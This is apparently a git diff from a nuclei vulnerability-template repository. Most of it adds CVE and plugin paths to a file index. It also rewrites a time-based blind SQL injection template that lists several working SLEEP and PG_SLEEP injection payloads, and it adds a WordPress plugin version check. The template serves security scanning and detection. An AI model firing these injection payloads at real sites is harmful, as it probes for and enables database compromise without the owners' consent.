@@ -40166,11 +40226,15 @@ ./poc/cve/CVE-2024-43317-011ac22d3cc6a5c25823442686fbcdc2.yaml ./poc/cve/CVE-2024-43317.yaml ./poc/cve/CVE-2024-43318-2b25423b32cf8d58d4d746ef14271f2d.yaml +./poc/cve/CVE-2024-43318.yaml ./poc/cve/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml +./poc/cve/CVE-2024-43319.yaml ./poc/cve/CVE-2024-43320-7a90f649b86cc56b7a348322fbac253a.yaml ./poc/cve/CVE-2024-43320.yaml ./poc/cve/CVE-2024-43321-96ff47f665eb548628bdc9a031d6d70f.yaml +./poc/cve/CVE-2024-43321.yaml ./poc/cve/CVE-2024-43322-7ad3832de8b95672975dfcfb60f3598f.yaml +./poc/cve/CVE-2024-43322.yaml ./poc/cve/CVE-2024-43323-1e55a206c0d1e018c5ca8cb550ad6b43.yaml ./poc/cve/CVE-2024-43323.yaml ./poc/cve/CVE-2024-43324-f70541b1201ac529a1d78e7fc9af3a3e.yaml @@ -40180,7 +40244,9 @@ ./poc/cve/CVE-2024-43326-24f0ba897b67329ec3ddf6753f94ed32.yaml ./poc/cve/CVE-2024-43326.yaml ./poc/cve/CVE-2024-43327-8726b3a0797315fcc152dad280cbac4b.yaml +./poc/cve/CVE-2024-43327.yaml ./poc/cve/CVE-2024-43328-732c7a81ff60a18d2ff887b256fba242.yaml +./poc/cve/CVE-2024-43328.yaml ./poc/cve/CVE-2024-43329-67a50fee28efbf96992a3faa792ae691.yaml ./poc/cve/CVE-2024-43329.yaml ./poc/cve/CVE-2024-4333-f46d8860d5d05aeb17e4da3bc1c85b85.yaml @@ -40193,6 +40259,7 @@ ./poc/cve/CVE-2024-43332-53d4557dc08feb794f7aa79a5132bebf.yaml ./poc/cve/CVE-2024-43332.yaml ./poc/cve/CVE-2024-43335-d46b713e90a8332ac8b26c7a7126c9a0.yaml +./poc/cve/CVE-2024-43335.yaml ./poc/cve/CVE-2024-43336-28f522c815326c862a095ad99702db7f.yaml ./poc/cve/CVE-2024-43336.yaml ./poc/cve/CVE-2024-43337-d59a162bda0a92fcb5cbdc9c17791b8c.yaml 
@@ -40206,24 +40273,33 @@ ./poc/cve/CVE-2024-43341-7cb78fbac960da5bc11a78009c156b3f.yaml ./poc/cve/CVE-2024-43341.yaml ./poc/cve/CVE-2024-43342-3188eb24eebca6379b805dcc2fd53688.yaml +./poc/cve/CVE-2024-43342.yaml ./poc/cve/CVE-2024-43343-bd86d015b232e15272dc87f2bcd25950.yaml ./poc/cve/CVE-2024-43343.yaml ./poc/cve/CVE-2024-43344-dd2bfc771cca501ba1c20aa66e532070.yaml +./poc/cve/CVE-2024-43344.yaml ./poc/cve/CVE-2024-43345-818187bf525840885c083c5886f89859.yaml +./poc/cve/CVE-2024-43345.yaml ./poc/cve/CVE-2024-43346-461457ac208690c9e7435e5f9cf93bf1.yaml +./poc/cve/CVE-2024-43346.yaml ./poc/cve/CVE-2024-43347-0ff8bf2832d5ae37d05ab294908e3044.yaml ./poc/cve/CVE-2024-43347.yaml ./poc/cve/CVE-2024-43348-1d80aee807a5a09c59890436b5a4ba06.yaml +./poc/cve/CVE-2024-43348.yaml ./poc/cve/CVE-2024-43349-7fa6ced0e3688a0b29dd0f4527ae5d77.yaml ./poc/cve/CVE-2024-43349.yaml ./poc/cve/CVE-2024-4335-b652f11b1fd244c356f7f9040d2d61fc.yaml ./poc/cve/CVE-2024-4335.yaml ./poc/cve/CVE-2024-43350-7658ea1ea1a448ef16e7448bb1e7b7a3.yaml +./poc/cve/CVE-2024-43350.yaml ./poc/cve/CVE-2024-43351-4309475ec19267ac7d3446460f31cb63.yaml ./poc/cve/CVE-2024-43351.yaml ./poc/cve/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml +./poc/cve/CVE-2024-43352.yaml ./poc/cve/CVE-2024-43353-f420c4e69c0e2367aa76bcdf09d1f8d5.yaml +./poc/cve/CVE-2024-43353.yaml ./poc/cve/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml +./poc/cve/CVE-2024-43354.yaml ./poc/cve/CVE-2024-43355-aaaae66dd8d3768a39f3d3ed3c2c4630.yaml ./poc/cve/CVE-2024-43355.yaml ./poc/cve/CVE-2024-43356-05ef8f8be0b196ca83c544147054d339.yaml @@ -40254,6 +40330,7 @@ ./poc/cve/CVE-2024-4356-ac59816e5a220379cae065e7ced8ca1c.yaml ./poc/cve/CVE-2024-4356.yaml ./poc/cve/CVE-2024-4358.yaml +./poc/cve/CVE-2024-4359-739b7c6397af07930a602ed827679ba1.yaml ./poc/cve/CVE-2024-4359-a02da093773a725f098d0f6b3982b1f5.yaml ./poc/cve/CVE-2024-4359.yaml ./poc/cve/CVE-2024-4360-2ce554962ceb2089ac94ef643f6a051a.yaml 
@@ -41043,6 +41120,7 @@ ./poc/cve/CVE-2024-5501-ef276788ff5605e6f36a518160e844c2.yaml ./poc/cve/CVE-2024-5501.yaml ./poc/cve/CVE-2024-5502-46f49a6a29c567a0601ab29368ea1138.yaml +./poc/cve/CVE-2024-5502.yaml ./poc/cve/CVE-2024-5503-19d06aa0a465a31a35fc811375db77be.yaml ./poc/cve/CVE-2024-5503-22284592e7f2d4be691954a9ef8c96d2.yaml ./poc/cve/CVE-2024-5503.yaml @@ -41610,6 +41688,7 @@ ./poc/cve/CVE-2024-6489.yaml ./poc/cve/CVE-2024-6491-077c7077f2470ec50c66a49785e52870.yaml ./poc/cve/CVE-2024-6491.yaml +./poc/cve/CVE-2024-6493-8ce30d589b40d67eb51efe70935d8bd9.yaml ./poc/cve/CVE-2024-6494-1f03219d59ff7e715b118bf84690f350.yaml ./poc/cve/CVE-2024-6494.yaml ./poc/cve/CVE-2024-6495-7f7d4d9be9d13fb4035edaa3d3829c0a.yaml @@ -41620,6 +41699,7 @@ ./poc/cve/CVE-2024-6497.yaml ./poc/cve/CVE-2024-6498-2ab2ecf188af29e491c09cc5e16d6c6a.yaml ./poc/cve/CVE-2024-6498.yaml +./poc/cve/CVE-2024-6499-506582290ab27969bbad70e6796d3810.yaml ./poc/cve/CVE-2024-6500-76d6d82cf0d857f1f99bb5f0649b9e93.yaml ./poc/cve/CVE-2024-6500-e8578bf41793cff7e63bbe53d1903e0e.yaml ./poc/cve/CVE-2024-6500.yaml @@ -41701,6 +41781,7 @@ ./poc/cve/CVE-2024-6599-9ad4db4a6e6fd3c87c5199e80410875f.yaml ./poc/cve/CVE-2024-6599-aa457f52df54a859bbebb756c962b901.yaml ./poc/cve/CVE-2024-6599.yaml +./poc/cve/CVE-2024-6617-861b78cb0bd74ebded540a2ef2369b65.yaml ./poc/cve/CVE-2024-6621-02b2446a68489e575b652c2201b7d541.yaml ./poc/cve/CVE-2024-6621.yaml ./poc/cve/CVE-2024-6624-3e8f54a8f5a599fccb32276f2c459503.yaml @@ -41711,6 +41792,7 @@ ./poc/cve/CVE-2024-6627.yaml ./poc/cve/CVE-2024-6629-d16f070910ae811c719a92ea7113c3c7.yaml ./poc/cve/CVE-2024-6629.yaml +./poc/cve/CVE-2024-6631-b90f42cd5d41e04b09c0aa755df89cc7.yaml ./poc/cve/CVE-2024-6634-1294d62a2e83c6ca71566c3b267c34d2.yaml ./poc/cve/CVE-2024-6634.yaml ./poc/cve/CVE-2024-6635-0f3174f37f221bf395fa03e4aca4837b.yaml 
@@ -41727,8 +41809,10 @@ ./poc/cve/CVE-2024-6660.yaml ./poc/cve/CVE-2024-6661-865ee81f979d667850ff2bc7887f6239.yaml ./poc/cve/CVE-2024-6661.yaml +./poc/cve/CVE-2024-6665-8c1223ca753362f23c9223b5d83c7625.yaml ./poc/cve/CVE-2024-6666-f524b500b74a1c90be50f56d9d664783.yaml ./poc/cve/CVE-2024-6666.yaml +./poc/cve/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml ./poc/cve/CVE-2024-6668-6a6e2b0e2761e93d3ce06e929012b06f.yaml ./poc/cve/CVE-2024-6668.yaml ./poc/cve/CVE-2024-6669-1f8f47157f2608b3fb02a0319a35eb1c.yaml @@ -41903,6 +41987,7 @@ ./poc/cve/CVE-2024-7257.yaml ./poc/cve/CVE-2024-7258-7733e570fd91ef0e0dd37c76462776c5.yaml ./poc/cve/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml +./poc/cve/CVE-2024-7258.yaml ./poc/cve/CVE-2024-7291-9e11faff80d98ce3a78b182e2348528f.yaml ./poc/cve/CVE-2024-7291.yaml ./poc/cve/CVE-2024-7301-b82f30bc7f77018db154ad54534c5d05.yaml @@ -41913,6 +41998,7 @@ ./poc/cve/CVE-2024-7317.yaml ./poc/cve/CVE-2024-7350-fae9f5c8afaa9888e7d61c55abf3bb9e.yaml ./poc/cve/CVE-2024-7350.yaml +./poc/cve/CVE-2024-7351-93a2178394f4d78fbcc5b86f7c46b250.yaml ./poc/cve/CVE-2024-7353-51d3774cc31ba9c09e3ef4a4a7c21d55.yaml ./poc/cve/CVE-2024-7353.yaml ./poc/cve/CVE-2024-7355-464a77ba558154888cf73a5cab0a6cc4.yaml @@ -41962,10 +42048,12 @@ ./poc/cve/CVE-2024-7556-b7fed9351bafa7783a59e9c29c4c745a.yaml ./poc/cve/CVE-2024-7556.yaml ./poc/cve/CVE-2024-7559-0036d3af189dfdcdecf071d33e7a3e17.yaml +./poc/cve/CVE-2024-7559.yaml ./poc/cve/CVE-2024-7560-ce54c359794ac142d8dfa3e7571236b5.yaml ./poc/cve/CVE-2024-7560.yaml ./poc/cve/CVE-2024-7561-dd941493ec03049c383c879de09e421d.yaml ./poc/cve/CVE-2024-7561.yaml +./poc/cve/CVE-2024-7568-03c9c97fbcce1159bd078f05cbf27da7.yaml ./poc/cve/CVE-2024-7574-003dab2f041ca334b519548f81f66762.yaml ./poc/cve/CVE-2024-7574.yaml ./poc/cve/CVE-2024-7588-72d4c65f8b4a3c39e85f33895621e123.yaml 
@@ -41989,7 +42077,9 @@ ./poc/cve/CVE-2024-7649-411c4289e1354f2a4fd575707a009990.yaml ./poc/cve/CVE-2024-7649.yaml ./poc/cve/CVE-2024-7651-54b05056620424ffb4dfd689f232601b.yaml +./poc/cve/CVE-2024-7651-7d4af77ba7202b412fee68fa25bbbec8.yaml ./poc/cve/CVE-2024-7651.yaml +./poc/cve/CVE-2024-7656-cc628b96623048172302ddea18aada71.yaml ./poc/cve/CVE-2024-7689-f3a5e607572c3ebe82d6cfc65f846263.yaml ./poc/cve/CVE-2024-7689.yaml ./poc/cve/CVE-2024-7690-8d65eb5cdc8a149b1d94856146905574.yaml @@ -42022,6 +42112,7 @@ ./poc/cve/CVE-2024-7850.yaml ./poc/cve/CVE-2024-7854-c405929374c8ffa2432434eb86f570c7.yaml ./poc/cve/CVE-2024-7854.yaml +./poc/cve/CVE-2024-8120-3613ebb9d30f84ec400bcf99e23d31d1.yaml ./poc/cve/CVE_2023_49442.yaml ./poc/cve/CVE_2023_51467.yaml ./poc/cve/CVE_2024_0195.yaml @@ -54055,6 +54146,7 @@ ./poc/favicon/favicon-detection-7445.yaml ./poc/favicon/favicon-detection-7446.yaml ./poc/favicon/favicon-detection.yaml +./poc/favicon/favicon-generator-7c646439e38a1ba7bbbc75a1ac2635c5.yaml ./poc/favicon/favicon-rotator-6f8bd28dbfbd78a39c26211650d54ded.yaml ./poc/favicon/favicon-rotator.yaml ./poc/favicon/favicon-switcher-87d4523b4710268d91b0abc72f0e31c5.yaml @@ -55593,6 +55685,8 @@ ./poc/header/header-command-injection.yaml ./poc/header/header-enhancement-8ca1ca4a446ea27e1e50c6dcc62fa72b.yaml ./poc/header/header-enhancement.yaml +./poc/header/header-footer-code-08ebf57284e81768e19b2643c32c71af.yaml +./poc/header/header-footer-code-afbd01983360416a12cb28f807e89a8d.yaml ./poc/header/header-footer-code-manager-7e2fc078474ed72dc728c58a336de1d9.yaml ./poc/header/header-footer-code-manager-9cceddacd09591436f7c8d516629bf6f.yaml ./poc/header/header-footer-code-manager-b245f6dc3002019cd3f58800860207f5.yaml 
@@ -64790,6 +64884,7 @@
 ./poc/other/bitformpro-c1951a840a2ea27fbc40d83eac2e0432.yaml
 ./poc/other/bitformpro-d139e243b64b91b847d04cde6b5cce90.yaml
 ./poc/other/bitformpro-d755f86f5f98181fb2d499fd64b215af.yaml
+./poc/other/bitformpro.yaml
 ./poc/other/bithighway-product.yaml
 ./poc/other/bitkeeper.yaml
 ./poc/other/bitly.yaml
@@ -67608,6 +67703,7 @@
 ./poc/other/complianz-gdpr-premium.yaml
 ./poc/other/complianz-gdpr.yaml
 ./poc/other/compose-find.yaml
+./poc/other/compute-links.yaml
 ./poc/other/computer-repair-shop-0dc1141a40b6ac402337852cc158d793.yaml
 ./poc/other/computer-repair-shop-34ea74e81a4828837f1c1298c9543ed7.yaml
 ./poc/other/computer-repair-shop-89299e4538c620735b104dd6327e582d.yaml
@@ -68808,6 +68904,7 @@
 ./poc/other/custom-options-plus.yaml
 ./poc/other/custom-page-templates-by-vegacorp-ed8b780e27b1b65633e7aabaac5e4aad.yaml
 ./poc/other/custom-page-templates-by-vegacorp.yaml
+./poc/other/custom-permalinks-44331c84afd644601efc55a9e5863103.yaml
 ./poc/other/custom-permalinks-6e5ffde32e143b805c24b167ffb23885.yaml
 ./poc/other/custom-permalinks-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/custom-permalinks-d4ae105c321d1a9fb9b80fb4829023ad.yaml
@@ -69322,6 +69419,7 @@
 ./poc/other/devices.yaml
 ./poc/other/devrant.yaml
 ./poc/other/devto.yaml
+./poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml
 ./poc/other/dexs-pm-system-868efdaccc5f16808a6fb06fe3a1cbec.yaml
 ./poc/other/dexs-pm-system-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/dexs-pm-system-f0982fd918eb9ba0d5bc8bd0faec3225.yaml
@@ -69463,6 +69561,7 @@
 ./poc/other/discy.yaml
 ./poc/other/disneyplus-phish.yaml
 ./poc/other/display-a-meta-field-as-block-3651ac54124280b3e2d4d7a808a8f468.yaml
+./poc/other/display-a-meta-field-as-block.yaml
 ./poc/other/display-admin-page-on-frontend-6c0fa46386393b85d0ad0c373ab077eb.yaml
 ./poc/other/display-admin-page-on-frontend.yaml
 ./poc/other/display-custom-post-aa757b5702d208e7dc541f210bf378bd.yaml
@@ -74072,6 +74171,7 @@
 ./poc/other/giveaway-1d9e0bf21577ede31febad46bce13674.yaml
 ./poc/other/giveaway.yaml
 ./poc/other/givingpress-lite-f13848717586edd56855949bd81c07fd.yaml
+./poc/other/givingpress-lite.yaml
 ./poc/other/gkrellm.yaml
 ./poc/other/glass-b3268283daf190fd77277f208bd83ee4.yaml
 ./poc/other/glass.yaml
@@ -74473,6 +74573,7 @@
 ./poc/other/gutenslider-plugin.yaml
 ./poc/other/gutenslider.yaml
 ./poc/other/gutentor-d377e101a76164370c9cc0ec45a485ee.yaml
+./poc/other/gutentor.yaml
 ./poc/other/gutenverse-40a79e4610379f5cd721264ce32ca881.yaml
 ./poc/other/gutenverse-6f744d9cd8863d765631de4d3721f56e.yaml
 ./poc/other/gutenverse-d18f386a56dccce0e578f26d0a128ebd.yaml
@@ -75013,6 +75114,7 @@
 ./poc/other/hqtheme-extra-plugin.yaml
 ./poc/other/hqtheme-extra.yaml
 ./poc/other/hr-management-eb3b99f576f6e9904bb734d15faf495b.yaml
+./poc/other/hr-management.yaml
 ./poc/other/hreflang-manager-lite-4fdca8511452f1b9eaf9cfabe504c2f4.yaml
 ./poc/other/hreflang-manager-lite-c79e04798382f59535d810f01cec980c.yaml
 ./poc/other/hreflang-manager-lite-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -75576,6 +75678,8 @@
 ./poc/other/imagerecycle-pdf-image-compression-09234a10f0a73301163efb33488d8f40.yaml
 ./poc/other/imagerecycle-pdf-image-compression-25ca6258ba26d4aa6efd9c033515cbd6.yaml
 ./poc/other/imagerecycle-pdf-image-compression-68818ede461c0658e1b76bc01df4841a.yaml
+./poc/other/imagerecycle-pdf-image-compression-76fdeef266854108ceda8d0e46474378.yaml
+./poc/other/imagerecycle-pdf-image-compression-7b8181a7be59fef3323111e90fb3e895.yaml
 ./poc/other/imagerecycle-pdf-image-compression-8d61374692407f29c3794cb06b90237f.yaml
 ./poc/other/imagerecycle-pdf-image-compression-8e08eeb3b1a1291c3a2ceea6474c0baa.yaml
 ./poc/other/imagerecycle-pdf-image-compression-9ca66671490c274b708953b237afd4f4.yaml
@@ -76779,6 +76883,7 @@
 ./poc/other/kbslider-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/kbslider-plugin.yaml
 ./poc/other/kbslider.yaml
+./poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml
 ./poc/other/kd-coming-soon-2265a234dfded05f01d36b926bceb429.yaml
 ./poc/other/kd-coming-soon.yaml
 ./poc/other/kedacom-dvr接入网关.yaml
@@ -78667,6 +78772,7 @@
 ./poc/other/maxbuttons-4cd8e1d07c24433f81b2881428158931.yaml
 ./poc/other/maxbuttons-4f03bd0c0caa4c1e80d6f93954f270a3.yaml
 ./poc/other/maxbuttons-539c47514cbc9de43b420d67a8fbe903.yaml
+./poc/other/maxbuttons-64ecf3c81675d9335f44728b57cd5ada.yaml
 ./poc/other/maxbuttons-77b4962931560c0b9835b520a08e8262.yaml
 ./poc/other/maxbuttons-b7fd66fddae5690f181f58582d0e793c.yaml
 ./poc/other/maxbuttons-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -83350,6 +83456,7 @@
 ./poc/other/pure-chat.yaml
 ./poc/other/puridiom.yaml
 ./poc/other/purity-of-soul-eb9462c64668d462d768e2cde373e11a.yaml
+./poc/other/purity-of-soul.yaml
 ./poc/other/purosa-b49dafa9501f406e94b1c544d3cb4ee0.yaml
 ./poc/other/purosa.yaml
 ./poc/other/purus-76c6b84ccd9f6bd60eada03675ff7bce.yaml
@@ -84367,6 +84474,7 @@
 ./poc/other/responsive-add-ons.yaml
 ./poc/other/responsive-b35acf8634721bd8b2254b89aad90bd4.yaml
 ./poc/other/responsive-block-editor-addons-cb81193d1b4184fab4fc973bfc5493ba.yaml
+./poc/other/responsive-block-editor-addons.yaml
 ./poc/other/responsive-c567878f616fa78cef0a6bc18a4ad518.yaml
 ./poc/other/responsive-category-slider.yaml
 ./poc/other/responsive-column-widgets-10174a5bcac9bad47e8550b3d07ca19d.yaml
@@ -84921,6 +85029,7 @@
 ./poc/other/rt-custom-css-page-and-post-plugin.yaml
 ./poc/other/rt-custom-css-page-and-post.yaml
 ./poc/other/rt-easy-builder-advanced-addons-for-elementor-1d1da6356ce509687702931ab583a99d.yaml
+./poc/other/rt-easy-builder-advanced-addons-for-elementor-32e6bc9d123752add9e4c25d6a9ec9b3.yaml
 ./poc/other/rt-easy-builder-advanced-addons-for-elementor-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/rt-easy-builder-advanced-addons-for-elementor-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/rt-easy-builder-advanced-addons-for-elementor-plugin.yaml
@@ -86244,6 +86353,7 @@
 ./poc/other/simple-job-board-4fd2e55b1c3ee85975995bfd883f5d47.yaml
 ./poc/other/simple-job-board-78ba3267d8cc0c490a80279cd1df5519.yaml
 ./poc/other/simple-job-board-89de81188a27eb9b10cd5e2de1f40b45.yaml
+./poc/other/simple-job-board-9bc0f6e9ceea482ebafd8c072ceaed1f.yaml
 ./poc/other/simple-job-board-b8c4678c8c8d22ceaed50ffbf977a0f0.yaml
 ./poc/other/simple-job-board-fc75e846a4b7cfc4113b06125b630f14.yaml
 ./poc/other/simple-job-board.yaml
@@ -87800,6 +87910,7 @@
 ./poc/other/striking-r-cc542169b382522dcdc5b994757d4870.yaml
 ./poc/other/striking-r.yaml
 ./poc/other/string-locator-0059c7949798057ecdac2004037e9dd7.yaml
+./poc/other/string-locator-b6189df65fa837d8ca49f92847869143.yaml
 ./poc/other/string-locator.yaml
 ./poc/other/stripchat.yaml
 ./poc/other/stripe-gateway-6fec145a64c840003085f7492ae5cd7a.yaml
@@ -91046,6 +91157,7 @@
 ./poc/other/vistered-little-bb15fc0afbd39462bbb4450087669bb5.yaml
 ./poc/other/vistered-little.yaml
 ./poc/other/visual-composer-starter-6909271bdc06f95eea673edff022023b.yaml
+./poc/other/visual-composer-starter.yaml
 ./poc/other/visual-form-builder-355778cd9ce14bd4396f412f1952e5bb.yaml
 ./poc/other/visual-form-builder-5e4ed275d9505a830c27353ad55f8a35.yaml
 ./poc/other/visual-form-builder-72503cf643bf257391bc9aa733939b75.yaml
@@ -91713,6 +91825,7 @@
 ./poc/other/whmcs.yaml
 ./poc/other/whmpress-0d5977b07c81b352711972147990171c.yaml
 ./poc/other/whmpress-a7309bcc642848ac99c10a4311b79606.yaml
+./poc/other/whmpress.yaml
 ./poc/other/who-hit-the-page-hit-counter-89883786f75e8dc84847064827029c37.yaml
 ./poc/other/who-hit-the-page-hit-counter-a1e508b6aa56ac41251dd289b91ee3dd.yaml
 ./poc/other/who-hit-the-page-hit-counter-a8aa7e6da9021bb8e7c5234d4deec357.yaml
@@ -95752,6 +95865,7 @@
 ./poc/remote_code_execution/order-delivery-date-for-woocommerce-plugin.yaml
 ./poc/remote_code_execution/order-delivery-date-for-woocommerce.yaml
 ./poc/remote_code_execution/order-export-and-more-for-woocommerce-229e7a7cf1d14530bd6fed684bfc01b3.yaml
+./poc/remote_code_execution/order-export-and-more-for-woocommerce.yaml
 ./poc/remote_code_execution/order-import-export-for-woocommerce-0e7c6b52509d8bfd0e2b068d7ec9abcb.yaml
 ./poc/remote_code_execution/order-import-export-for-woocommerce-deb2f706b61560f21bb9bc439367e4c9.yaml
 ./poc/remote_code_execution/order-import-export-for-woocommerce-fd8db3c088a1878860378bbefce894e8.yaml
@@ -100672,6 +100786,7 @@
 ./poc/sql/CVE-2023-0731-6b1bdbb604eab6df2c8bf94baac224ee.yaml
 ./poc/sql/CVE-2023-0768-3c47ee48dbbd62e5b9ceae69cefdfe9b.yaml
 ./poc/sql/CVE-2023-0891-d7c3047f3679d7a41db56e72a1127815.yaml
+./poc/sql/CVE-2023-0926-9e5bd7af9323069d7f5b80fe13c3adbc.yaml
 ./poc/sql/CVE-2023-0940-68c8a812a7f4d3db6d4f04bb90d0d9a4.yaml
 ./poc/sql/CVE-2023-0948-264bca3636b9ae9aec54db37004c93eb.yaml
 ./poc/sql/CVE-2023-0955-81e9f6dd032ddbc4235c39ce2b4b6385.yaml
@@ -101732,6 +101847,7 @@
 ./poc/sql/CVE-2024-6579-9c7c0b2d8fd09d2e14eb936004e4ddb9.yaml
 ./poc/sql/CVE-2024-6588-af347ddbbf742df5b2786c5ede788153.yaml
 ./poc/sql/CVE-2024-6599-9ad4db4a6e6fd3c87c5199e80410875f.yaml
+./poc/sql/CVE-2024-6667-4b06082c59fafdba7199d79388d0eff6.yaml
 ./poc/sql/CVE-2024-6692-0894f7f570adb2ce646abb2ca918e268.yaml
 ./poc/sql/CVE-2024-6695-26c3b0fedbe50bc4ddd4f80533e99c22.yaml
 ./poc/sql/CVE-2024-6710-768106c61e7cc7c723b9dfffd30dbc29.yaml
@@ -104040,6 +104156,7 @@
 ./poc/sql/kali-forms-198b8bdbd0f5ead8d3fad8b9e445b0ab.yaml
 ./poc/sql/kb-support-16f8a5e2b5db04d4e374b282d871c4b7.yaml
 ./poc/sql/kbslider-d1db2f87ba0712e1c037d7fa87dbf0bd.yaml
+./poc/sql/kbucket-e74990277ea37a8d6eb0543a824bddb7.yaml
 ./poc/sql/keep-backup-daily-327b6a6a640edb13bfc96ce69665c4fa.yaml
 ./poc/sql/kento-post-view-counter-a5fedfc9aea2a7db95d52ff7f7b738e8.yaml
 ./poc/sql/keron-aio-moffice-sqli.yaml
@@ -111324,6 +111441,7 @@
 ./poc/wordpress/lean-wp.yaml
 ./poc/wordpress/leopard-wordpress-offload-media-9c17da68fdae227d54ebf6f8caf803ed.yaml
 ./poc/wordpress/leopard-wordpress-offload-media-b3f7a58954d39d9abc50308a2c689e43.yaml
+./poc/wordpress/leopard-wordpress-offload-media.yaml
 ./poc/wordpress/lim4wp-6355cc5298b74aae91fbc3add72431cc.yaml
 ./poc/wordpress/lim4wp-85c0c2a57191d8f1425d9f6b31a4f872.yaml
 ./poc/wordpress/lim4wp-bdfc359e3288238435c76be20d0c749a.yaml
@@ -116925,6 +117043,7 @@
 ./poc/wordpress/wp-travel-71620b005bcbf2aee9f61b11bd4c7a65.yaml
 ./poc/wordpress/wp-travel-a5c7da051e57e878aa92aaa58a089e18.yaml
 ./poc/wordpress/wp-travel-blocks-2d175246c46ae37e6bc999dc696b78af.yaml
+./poc/wordpress/wp-travel-blocks.yaml
 ./poc/wordpress/wp-travel-engine-5dbbaad444b84209703eb55cd167d8a5.yaml
 ./poc/wordpress/wp-travel-engine-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/wordpress/wp-travel-engine-95a033691d3f2bc9fa850c217ca94e96.yaml
@@ -118048,6 +118167,7 @@
 ./poc/wordpress/wptables-1c8f16aeda7755bc222dcfdc54f2e9b8.yaml
 ./poc/wordpress/wptables.yaml
 ./poc/wordpress/wptelegram-widget-a37d54894422d71175e71f451950cb5b.yaml
+./poc/wordpress/wptelegram-widget.yaml
 ./poc/wordpress/wptf-image-gallery-fcb84176c85e1d348e75f01cbfe51bdb.yaml
 ./poc/wordpress/wptf-image-gallery.yaml
 ./poc/wordpress/wptools-1d6961a309e74315b43f9b84a7612ac8.yaml
diff --git a/poc/auth/BlindSQLAuth.yaml b/poc/auth/BlindSQLAuth.yaml
index 6fd8c3c79a..ce5d86554b 100644
--- a/poc/auth/BlindSQLAuth.yaml
+++ b/poc/auth/BlindSQLAuth.yaml
@@ -1,33 +1,33 @@ -id: time-based-sqli -info: - name: Time-Based Blind SQL Injection - author: Coffinxp/lostsec - severity: Critical - description: Detects time-based blind SQL injection vulnerability -http: - - method: GET - path: - - "{{BaseURL}}" - payloads: - injection: - - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" - - "'%2b(select*from(select(sleep(7)))a)%2b'" - - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" - - "'XOR(if((select now()=sysdate()),sleep(7),0))XOR'Z" - - "X'XOR(if(now()=sysdate(),/**/sleep(7)/**/,0))XOR'X" - - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" - - "X'XOR(if(now()=sysdate(),(sleep((((7))))),0))XOR'X" - - "if(now()=sysdate(),SLEEP(7),0)" - - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" - - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" - fuzzing: - - part: query - type: replace - mode: single - fuzz: - - "{{injection}}" - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - "duration>=7 && duration <=16" +id: time-based-sqli +info: + name: Time-Based Blind SQL Injection + author: KhukuriRimal + severity: Critical + description: Detects time-based blind SQL injection vulnerability +http: + - method: GET + path: + - "{{BaseURL}}" + payloads: + injection: + - "(SELECT(0)FROM(SELECT(SLEEP(7)))a)" + - "'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z" + - "' AND (SELECT 4800 FROM (SELECT(SLEEP(7)))HoBG)--" + - "if(now()=sysdate(),SLEEP(7),0)" + - "'XOR(if(now()=sysdate(),SLEEP(7),0))XOR'Z" + - "'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(7) ELSE 0 END)XOR'Z" + - "XOR(if(now()=sysdate(),sleep(7),0))XOR" + - "1%20AND%201337%3d(SELECT%201337%20FROM%20PG_SLEEP(7))--%201337" + fuzzing: + - part: query + type: replace + mode: single + fuzz: + - "{{injection}}" + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - "status_code == 200" + - "duration>=7 && duration <=16" + condition: and \ No newline at end of file 
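Review bot: The new `status_code == 200` term, joined to the timing check by `condition: and`, makes the template miss every case where the delayed response is not a 200 — a redirect after a login form or a 500 from the database layer are both common outcomes here — and the previous matcher had no such restriction; nothing in the hunk explains why a non-200 slow response should no longer count. The timing window `duration>=7 && duration <=16` on its own also fires on any host that is simply slow, so a comment above `matchers` such as `# a 7-16s response is a hint, not proof; compare against an un-injected baseline before reporting` would help whoever triages the output. The last injection entry is pre-URL-encoded (`%20`, `%3d`) while the others are raw; whether the `query` fuzzer encodes it a second time depends on nuclei's implementation and should be confirmed. The rewritten file also ends without a trailing newline.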
diff --git a/poc/auth/login-as-users.yaml b/poc/auth/login-as-users.yaml new file mode 100644 index 0000000000..089a81f9a9 --- /dev/null +++ b/poc/auth/login-as-users.yaml @@ -0,0 +1,59 @@ +id: login-as-users + +info: + name: > + Login As Users <= 1.4.2 - Authentication Bypass + author: topscoder + severity: critical + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/73a0d7a9-374b-430d-a7e5-3c7cdaff5785?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/login-as-users/" + google-query: inurl:"/wp-content/plugins/login-as-users/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,login-as-users,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-as-users/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: 